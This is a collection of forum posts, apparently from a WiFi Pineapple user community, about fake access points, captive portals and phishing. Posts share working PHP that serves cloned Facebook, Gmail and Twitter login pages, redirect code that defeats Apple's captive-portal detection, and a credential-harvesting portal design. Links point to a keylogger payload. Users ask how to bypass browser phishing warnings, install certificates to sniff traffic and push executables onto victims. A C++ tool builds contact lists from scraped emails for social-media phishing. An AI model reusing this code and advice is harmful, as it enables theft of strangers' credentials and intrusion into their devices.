Search the Community

So i bought the wifipineapple TETRA, and ive been experimenting with modules and such. Now i have 2 questions which i couldent really figure out my self, thus im asking here. (Im also not sure into which subforum to post this but hey...) - i thought about creating a "fake ap" which, when you connect to it, asks you to login w/ your gmail or facebook account. If someone could suggest me a module that enables me to do this (with a reasonable tutorial), i would be very greatfull. - 2cnd question is probably simple but yet indid not find this option... How do i protect my fake ap with a password encryption (wpa/wpa2) ? It should really work with modules enabled..... is this possible? huge thanks in advance ;)

Hi there, I just finished the first version of my BB keylogger. It basicly launches a powershell which keylogs to the loot folder of the BB. Features: Fast launching (thanks to USB Exfil for the one line launcher) Leaves no traces when cleanup is enabled. (Insert feature?) Link: https://github.com/Vinc0682/bashbunny-payloads/tree/master/payloads/library/phishing/WinKeylogger VincBreaker PS: I will create a push request upon positive feedback and improve the payload in the other case.

I thought this might be a good topic for discussion. I had wondered how hard it would be add a bunch of people I didn't know to facebook or LinkedIn. I had noticed when I signed up for some social media sites that there is an option to import contacts from your email contact list. While it's illegal to send spam emails I don't think it's illegal to use the email addresses to add friends on facebook. So basically if you wanted to find a bunch of people from a company or a school on LinkedIn or facebook you could pretty much use a method like this in social engineering or phishing on social media. Once again I'm not totally sure on the legality of doing this but I figure it is worth a discussion. Steps: Get the email list I figured a guy could pretty much hit up pastebin and create an email list for any organization he wanted to target. Grep out the email address and sort them for uniqueness. Also sort out domain names or domain extenssions you don't want like .gov or .mil addresses. You probably wouldn't want to accidentally spam or phish them. Split the lists into sections smaller than the maximum allowed limit. I think gmail it's 3000 or 5000. Forgot it. split them into 2500 line text files. Then convert the text file into CSV with a program kinda like this. I wrote this pretty hastily. Just opens up a file and writes a csv header with the correct fomat for gmail. Make sure to get the number of commas right. You can do this with Yahoo! and other free email services. There are some security measures against it. Then import the email list into your contacts as a CSV. Then add friends on social media sites from your contact list. That simple. Here's a link to the blog post I wrote about it. http://codeexamplescplusplus.blogspot.com/2016/10/csv-maker-c.html Here's some hasty C++ for the CSV maker. My code is shit just to let you know in advance. //application to sort email addresses and put them into a CSV for use with gmail. #include <string> #include <sstream> #include <iostream> #include <cctype> #include <fstream> #include <iomanip> using namespace std; int main (int argc, char* argv[]) { //build command line statement from string variables {ofstream myfile; myfile.open ("/root/Desktop/emails.csv"); { string line; ifstream infile ("/root/file.txt"); //input the layout information for CSV file myfile << "Name,Given Name,Additional Name,Family Name,Yomi Name,Given Name Yomi,Additional Name Yomi,Family Name Yomi,Name Prefix,Name Suffix,Initials,Nickname,Short Name,Maiden Name,Birthday,Gender,Location,Billing Information,Directory Server,Mileage,Occupation,Hobby,Sensitivity,Priority,Subject,Notes,Group Membership,E-mail 1 - Type,E-mail 1 - Value,E-mail 2 - Type,E-mail 2 - Value" << endl; if (infile.is_open()) { while ( getline (infile,line) ) //output conacts to contact list. Comas delimit contact information fields. myfile << ",,,,,,,,,,,,,,,,,,,,,,,,,,,* ," << line << ",," << endl; infile.close(); myfile.close(); } else cout << "Unable to open file" << endl; } } return 0; }

anyone get this working ---- nano connecting to vps which is serving up web pages to grab crews and then sending it back to the nano. obviously the vps would have a ton or all the major pages in cache to grab the reds and then pass the traffic...??? or how can i make a splash page on the nano that the user clicks on - like free wifi - click for TOS - and it installs a cert of mine and then just sniff the business all day long? one last bit of guidance needed --- how can i use the nano to have it install an EXE on windows pc's???

Hey everyone, I wrapped some of the Karma functionality in PHP so you can do AP name-based phishing, and maybe some other things. I only have a Mark IV WFP so I don't know how this integrates with the Mark V. Check it out, and let me know what you think! https://github.com/memyselfandm/wfp_karma_php

Hi guys, im having troubles with the credential harvester. Im testing it with facebook on my local network, and firefox/Iceweasel doesn't detect anything, but chrome detects it after 5'. I've read that this is a built in function, not a blacklisted url. Does anybody know how to bypass this phishing alert? I've tried obfuscating the html code and that didin't work out. Thanks!

Hi all, just saw the interesting project WifiPhisher (https://github.com/sophron/wifiphisher) and asked myself if it could not be a nice feature/infusion for the MKV? Sorry, I'm not able to code this infusion but perhaps could it be a challenge for somebody else (in the future)? ;-)

Merry xmass to all readers !!! After reading a lot of stuff about Mark V i finally got it but as all manuals related to mark IV im really stuck.. For example : http://hak5.org/hack/pineapple-phishing Can anyone explain what do i need to change to make it working on Mark V ? Thanks

Hi !! Lets discuss correct redirection in this topic Since iOS 7 blocked the spoofing of http://www.apple.com/library/test/success.html I start looking for another way to block the Captive Network Assistant login page. After some research i have found some alternative addresses ios uses www.appleiphonecell.com captive.apple.com captive.apple.com www.apple.com www.itools.info www.ibook.info www.airport.us www.thinkdifferent.us response is (apple.php) <HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML> Just not sure if i wrote redirect.php it the correct way <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "www.appleiphonecell.com")){ header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "captive.apple.com")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.itools.info")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.ibook.info")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.airport.us")) { header('Status: 302 Found'); header('Location: apple.html'); } if (strpos($ref, "www.thinkdifferent.us")) { header('Status: 302 Found'); header('Location: apple.html'); }

Ok now that i've hopelessly given up on SSLstrip, i've moved on to Phishing. I followed this guide to the letter however I still can't get it to work. I was able to get to the example page but that's just about it. PLEASE SOMEONE HELP!!!

Thanks to Hak5 for bring the Mark V to the masses--would like to see more examples of various hacks thus I assume this is what the forums are for so, here are some questions. I went to the link below and thinks its a good tutorial but think the person left out a bunch of Stuff and has it wrong on the whole Whitelist thing they mentioned in the guide--I think they met to say you need to black list----- file:///home/q/Downloads/Phishing%20for%20Facebook%20logins%20with%20the%20WiFi%20Pineapple%20Mark%20V%20from%20HAK5%20%28Setup%20Guide%29%20|%20.%20.%20TheSecurityBlogger%20.%20.%20..html ==================================================== While these are Mundane ---I think Hak5 should address them or put out a printed living document on the various options Questions: I want to create a rouge AP ( for edutional purposes only ) to get those in my vacinity ( class rooms) outside perimieter to connect through my Mark V. As in article above I want to use the 3 tools TCPDUMP ( need wireshark ro look at dump file??? ) WIFI manager and SSLstrip PLus using Karma the follwing questions arise hoe top get feed back. I am running a laptop, with a WIFI router connection ( rouge AP ) and Pineapple connected to my laptop 1) Where in the WIFI setup tabs do I " Share " the network? 2) Should both Wlano --my wifi and Wlan1 my wired --should both be enabled? 3)In Wifi Manager Should both Physicial interfaces be enabled? >DO you have to click "start Monitor" for both interfaces or do you need only to monitor the wireless? 4)On my laptop under network connections should the setting be on ad hoc or infrastructure? 5)When using TCPdump--what should be selcted in the drop menu , Wlano,Mono,LO,Etho,Br-lan ??? What is Br -Lan 6)TcpDump--SHould Verbose be used? Does Dont resolve host names or Dont resolve Portnames should it be used? 7)When I click SSlstrip log file it just displays a black page in a window webbrowser--this requires using the back button to get back into mark V pannel -- KARMA As I read the forum--with the above scanrio-- I want or HAVE to Blacklist my SSID ??? Correct??? AND I also have to Blacklist my MAC addresses??? Both Wireless ( which is under SSID ) AND Wired MAC ??? I am unclear on this Thank you in advance for your replies!

I don't know, maybe somebody will find this useful in their pentesting arsenal. #!/usr/local/bin/python # HTMLgetter v1.0 by Forgiven # This is a handy bit of python that will reap the HTML code of any page # and output it to a txt file of your choice. import urllib2 urlStr = raw_input('Input the full URL of the webpage whose HTML code you which to reap:') fileName = raw_input("Input the *.txt filename for the output:") fileName = fileName + ".txt" fileOut = open(fileName, "w") try: fileHandle = urllib2.urlopen(urlStr) str1 = fileHandle.read() fileHandle.close() print '-'*50 print 'HTML code of URL =', urlStr print '-'*50 except IOError: print 'Cannot open URL %s for reading' % urlStr str1 = 'error!' fileOut.writelines(str1) print str1 fileOut.close() I thought it was cool, creates a nice txt file of the HTML from a web page...I guess I don't have permission to upload the .py for this above. But the code is small and simple enough to cp. You can find it on github at the link.

Hello, The weirdest thing I've seen on the Pineapple: My pineapple is draing it's internet from a 3G doungle (Alcatel X230M). I can surf the web while using the pineapple as an access point The Pineapple "Features" do NOTHING. There is no phishing, sslstrip doesn't even blink My question to you is: WTF? Why is the data flowing freely? Uri

Hello I have been a SET user for a long time, recently I have tried to use the website vector's site cloning hack and everything seems to work well until I try to use the cloning of the hotmail page, no matter what i try i get a blank page, it loads and shows up in SET but all I get is a blank, I have tried saving an offline page and the only way to get anything is to save as html NOT a complete web page and the sign in bars are tiny and not cloned correctly. Can anyone please give me some advice or help, I am stumped. Please and thanks

Hello everybody I am completely new to this whole hacking thing. I recently just purchased the pineapple mark IV and just wanted a few simple tasks that I could be able to perform using the device. Phishing, scanning networks, etc. I tried phishing yesterday on windows 7 but when I tried dumping the php files in winscp there was "no enough memory on the device". I plan on installing Linux Ubuntu very shortly so if you guys could point me to some easy "hacks" I could perform that would seriously be great. I'm an intern and my boss asked me to do this so I'm just trying to impress him with some basic tasks. Thank you guys so much for your help.

So ive been playing around with my new wifi pineapple. I'm very interested in learning the in's and outs and hope to reach out to everyone on the forums who have something to share. With that being said I am setting up my phishing files and (Stupid me) wrote my redirect.php verbiage on my error.php file. Not creating a back up I am hoping someone can SCP into their pineapple www folder and copy and paste everything in their error.php in the this topic so I can edit my file. The other option is if someone can send me a copy of their file or at least direct me to where I can get the material myself. Thanks for your help.

I just wanted to share some video tutorials that I have found very helpful in setting up and administering the WiFi pineapple: Security4Plus I'm not sure if the creator is active on the forums, but I have not seen any links to these tutorials. This resource was indispensable to me for setting up remote administration through a VPS.

I am almost finished with v0.1 of my offline phishing module. The premise of this module is simple. You set the ssid of an open wireless network (Free Public Wifi, etc.) When enabled, all requests will be forwarded to a 'walled garden' splash page. This will inform the viewer that they have limited access to only certain pages, and will give links to these pages. Every one of these pages are phishing pages that you can upload to the module (even your own!). Since all phishing pages are hosted locally, this module is intended to work all of the time, without internet access. It gives the user the impression that they are connecting to pages on the internet, yet all credentials are harvested. Another beautiful thing about this module is how little hardware it uses. I have been known to have up to 3 usb wifi cards plugged into my pineapple while using for deauth/wifi repeating etc... This module can be used with only a properly formatted flash drive, eliminating a need for a usb hub (and the extra power it consumes). I need Seb or someone at wifipineapple.com to verify me for module submission. I also would like to talk to Petertfm about this module. I have reused (embarrassingly large amounts of) his code from his RandomRoll module in this. Our modules are extremely similar in both frontend and backend. I would like to ask him a couple of questions/ get him to sign off on the parts of his code I used before making this public. I have tried to message him but he does not accept messages. Petertfm if you read this, please send me a message or an email at my uname [at] gmail.

So I just recently got the WiFi Pineapple (Mark IV, upgraded to version 2.7) and have been tinkering with it for the last couple days, but I've run into a few snags that I'm not sure about. First, I've been installing some of the infusions but have run into some trouble with getting some of them (namely, sslstrip and nmap) to work at all. When I visit the page for sslstrip or nmap, it comes up with a box saying that it isn't installed, and when clicking the links for either installing it on the pineapple itself or on the external usb I have, it will show the title of the box go to "Installing..." for a few seconds, then the page will refresh and it will still say that the module isn't installed (I can provide screenshots of this if necessary). I've tried installing both on the pineapple itself (with free space available) and on the external usb where some of my other modules such as randomroll are stored, but no dice either way. Also, I had a question about Karma. When I start it on the Pineapple, on certain devices, like my Macbook, public SSIDs I've been on (such as the local library, coffee shops, etc) are populated in the networks list, but on other devices such as my iPhone and my Ubuntu laptop, SSIDs I have previously been on don't populate (although, on my iPhone, if I add a new, fake SSID such as totallypwned it *will* see that one and will be able to connect to the pineapple through it). Is this normal behavior? Lastly, I had a question about how to go about testing phishing. In the episode about it (https://www.youtube.com/watch?v=3uNdu9TM3HM) Darren is able to put his phishing files in the /www/ folder, but, for me, I don't seem to have enough space to store them there, even without infusions installed. Is there a way to store those files on the external usb? Or do they have to be located in /www/? This would be nice as I would have more space to add even more pages, but i'm not sure if it's at all possible. Thanks for any and all help! ~ Alexander Here's some additional info if needed: Pineapple Hardware Version (ex: Mark III, Mark IV, etc.): Mark IV Pineapple Software Version (ex: 2.5.0, 2.6.4): 2.70 OS used to connect to the pineapple: Backtrack 5 laptop connected to and sharing internet with the pineapple over ethernet

I really like the way Petertfm worked the random roll mod. Was wondering if anyone has interest in putting a similar style mod together with various phish pages? I'm not much on the sh but would be willing to learn and assist in creating such a mod? R/ Z**

First off, my web dev skills are greatly rusty these days. It's been a while since I've had the chance to work on anything. Anyway, I was thinking about a way to use the MKIV for a targeted phishing attack. The Idea: A captive portal for harvesting domain credentials of a targeted company (for legitimate pen testing engagements). Using Karma (and possibly a deauth flood), clients connect to the MKIV. DNSSpoof forwards all requests to the local index.php which checks if the client has a valid session. If session is valid, it redirects the client to their requested URL. If session is NOT valid, it redirects the client to captiveportal.html where they are prompted to login with their domain credentials. Submitting the form POSTs to process.php which opens creds.txt, writes the entered credentials, builds the session, and redirects to success.html. Success page makes the client feel good and then redirects to the originally requested page. Implementation: I have attached* what I have done so far for anyone that wants to help out. I currently have a few of the pages done up. Index.php is properly redirecting to captiveportal.html, but when I submit the form I just get a blank white page for process.php. It doesn't look like it ever writes out the credentials or builds any session info. Drawing blanks on that for now. Any thoughts, feedback, code is appreciated. I'd like to eventually get this to the point that it can be wrapped up into a module/infusion for quick and easy implementation. This way, attacking companies with better wireless implementations becomes easier. You no longer have to use freeradius-wpe to capture the challenge/response and then crack. Why waste that time when you can just ask them nicely for their credentials? *It won't let me upload any of the files, so I threw it up in on github here: https://github.com/vidkun/captivePhish

Last night I started putting together a module that allows you control virtual machines from the pineapple control center. Let me know if this is something that interests anyone. http://youtu.be/7QQEI1Univ0?hd=1

Version 0.70 of the open source phishing education tool "spt" (Simple Phishing Toolkit) was released this week. Notable features and improvements in this version include: Vast improvements in the editing functionality for templates and education packages. Major changes include: two different editors to choose from (the oroginal spt text editor and TinyMCE), copy templates or education to new version and then customize them. Added education completion tracking, now you can determine if your targets completed the assigned education in a campaign. Support for the Google and TinyURL URL shortener services. Now your phishing emails can have shortened URLs, making them harder to detect. Support for sending SMTP using SSL secured connections. Enhancements to the viewing of campaign information including SMTP relay used and destination URL used. Initial support for using spt in SSL/TLS secured installations, code updates to prevent insecure content warnings. All forms now generate inline errors with entered value retention, allowing easy correction of incorrect or missing items without requiring all information to be entered again. Email tracking times are now more accurate when viewing campaign information. Most items in the Quick Start module now feature links allowing you to quickly access the desired location in the spt UI. Enhancements to the browser detection script for more information on what you need vs. what you have. Many security and usability issues fixed. Additional improvements in authentication and session management security. You can track all current, past, and future planned, changes on the spt project site on the "Change Log" tab of the Download page at http://www.sptoolkit.com/download/.'>http://www.sptoolkit.com/download/. If the project sounds interesting to you, please consider taking a look at it by downloading and testing it your environment. (We opted to remove the online demo of the spt after receiving some complaints from sites that were used to highlight the incredible effectiveness and ease of use of our site scraper). We always welcome all feedback and ideas as we continue to develop the project. Please feel free to contact us via replies to this thread, or via the contact form on the project web site. http://www.sptoolkit.com/ Thanks! - The spt project

Just like what I did with my random roll php version 2 I thought I would start a post to get clean links for phishing. Clean links IE example.com and not example.com/phish/example.html change /www/index.php to <?php $ref = $_SERVER['HTTP_REFERER']; $phishFolder = "phish/"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish" $skipInclude = 0; if (strpos($ref, "facebook")){ $phishFile = "facebook.html"; } elseif (strpos($ref, "gmail")) { $phishFile = "gmail.html"; } elseif (strpos($ref, "twitter")) { $phishFile = "twitter.html"; } else { require('error.php'); $skipInclude = 1; } if ($skipInclude == 0) { include($phishFolder.$phishFile); } ?> [/CODE] then add your phish pages to your thumb drive to say /usb/phish/ you can sym link to the /www/ folder [CODE] ln -s /usb/phish /www/phish [/CODE] now I am expecting your phishing setup to look like this /usb/phish/example.html and the source files could go into a folder like /usb/phish/example/ however you want to manage them last thing to do is edit all the .html files so that any links to the source folder include the phish/ folder IE "/phish/example/banner.jpg" what do you guys think? is this how phishing should be done from now on?